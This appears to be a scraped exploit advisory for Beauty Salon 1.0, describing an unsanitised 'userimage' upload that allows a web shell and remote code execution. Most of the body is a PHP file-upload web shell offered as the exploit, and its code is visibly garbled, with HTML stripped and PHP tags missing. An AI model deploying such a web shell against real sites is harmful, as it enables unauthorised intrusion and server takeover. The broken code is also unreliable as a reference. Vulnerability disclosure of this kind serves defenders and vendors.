Beauty Salon 1.0 Remote Shell Upload – Torchsec
## Exploit Author: nu11secur1ty
## Date: 10.12.2022
## Vendor: https://code4berry.com/projects/beautysalon.php
## Software: https://code4berry.com/project%20downloads/beautysalon_download.php
## Reference: https://github.com/nu11secur1ty/NVE/blob/NVE-master/2022/NVE-2022-1012.txt
## Description:
The parameter `userimage` from Beauty-salon-2022 suffers from Web
Shell-File Upload - RCE.
NOTE: The user permissions of this system are not working correctly, and
the function is not sanitizing well.
The attacker can use an already created account from someone who controls
this system and he can upload a very malicious file by using this
vulnerability,
or more precisely (no sanitizing of function for edit image), for whatever
account, then he can execute it from anywhere on the external network.
Status: HIGH Vulnerability
[+] Exploit:
```php
http://www.w3.org/TR/html4/strict.dtd">
function FocusOut(obj)
{
if(obj.value == '')
obj.value = obj.defaultValue;
}
WebShell's Location = http://$_SERVER['REQUEST_URI'] ?>
HTTP_HOST =
REQUEST_URI =
action="http://$_SERVER['REQUEST_URI'] ?>">
onfocus="FocusIn(document.file_upload.target)"
onblur="FocusOut(document.file_upload.target)">
if(isset($_POST['upload']))
{
$check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);
if($check == TRUE)
echo '
The file was uploaded successfully!!
';
else
echo '
File Upload was failed...
';
}
?>
```
# Proof and Exploit:
[href](https://streamable.com/ewdmoh)
# m0e3:
[href](
https://www.nu11secur1ty.com/2022/10/beauty-salon-2022-web-shell-file-upload.html
)
One Response to Beauty Salon 1.0 Remote Shell Upload – Torchsec